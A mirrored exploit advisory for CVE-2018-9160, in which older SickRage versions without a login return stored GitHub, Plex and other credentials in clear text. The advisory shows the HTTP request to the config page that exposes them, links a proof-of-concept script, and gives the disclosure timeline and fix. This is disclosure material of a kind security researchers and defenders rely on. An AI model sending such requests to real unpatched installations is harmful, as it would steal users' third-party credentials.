Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2018-9160 PoC — SickRage 安全漏洞

Source
Associated Vulnerability
Title:SickRage 安全漏洞 (CVE-2018-9160)
Description:SickRage是一款用于管理并存储电视节目的自动视频管理器。 SickRage 2018.03.09-1之前版本中存在安全漏洞,该漏洞源于HTTP响应中含有明文形式的凭证。攻击者可利用该漏洞获取信息。
Description
CVE-2018-9160
Readme
# Sickrage cleartext github credentials CVE-2018-9160
---------------------------------------------------------------------

1. About

---------------------------------------------------------------------
Exploit Title: SickRage Clear-Text Credentials in HTTP Response  
Date: 2018-04-01  
Exploit Author: Sven Fassbender  
Contact: https://twitter.com/mezdanak  
Vendor Homepage: https://sickrage.github.io  
Software Link: https://github.com/SickRage/SickRage  
Version: < v2018.03.09-1  
CVE : CVE-2018-9160  
Category: webapps  

---------------------------------------------------------------------

2. Background information

---------------------------------------------------------------------
"SickRage is an automatic Video Library Manager for TV Shows.  
It watches for new episodes of your favourite shows, and when they are posted it does its magic:   
automatic torrent/nzb searching, downloading, and processing at the qualities you want." --extract from https://sickrage.github.io  

---------------------------------------------------------------------

3. Vulnerability description

---------------------------------------------------------------------
SickRage returns clear-text credentials for e.g. GitHub, AniDB, Kodi, Plex etc. in HTTP responses.  
Prerequisite is that the user did not set a username and password for their SickRage installation. (not enforced, default)  
  
HTTP request:  

```html
GET /config/general/ HTTP/1.1  
Host: 192.168.1.13:8081  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.1.13:8081/config/backuprestore/  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
```
  
  
HTTP response:  

```html
HTTP/1.1 200 OK  
Content-Length: 113397  
Vary: Accept-Encoding  
Server: TornadoServer/4.5.1  
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"  
Date: Fri, 02 Mar 2018 10:47:51 GMT  
Content-Type: text/html; charset=UTF-8  

<!DOCTYPE html>  
<html lang="nl_NL">  
    <head>  
		[...]  
        <input type="text" name="git_username" id="git_username" value="email@example.com" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />  
        [...]  
        <input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />  
		[...]  
        </div>  
    </body>  
</html>  
```

---------------------------------------------------------------------

4. Proof of Concept

---------------------------------------------------------------------
https://github.com/mechanico/sickrageWTF/blob/master/get_github_creds_sickrage.py  

---------------------------------------------------------------------

5. Timeline

---------------------------------------------------------------------
[2018-03-07] Vulnerability discovered  
[2018-03-08] Vendor contacted  
[2018-03-08] Vendor replied  
[2018-03-09] Vulnerability fixed. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)  
  
---------------------------------------------------------------------

6. Recommendation

---------------------------------------------------------------------
Update the SickRage installation on v2018.03.09-1 or later.  
Protect the access to the web application with proper user credentials.  
  
---------------------------------------------------------------------
File Snapshot

[4.0K] /data/pocs/df38c6d2103e9e58fbd2a96f09364575ab017c35 ├── [4.3K] 20180401_CVE-2018-9160.txt ├── [1.0K] get_github_creds_sickrage.py ├── [3.5K] README.md └── [ 33] requirements.txt 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.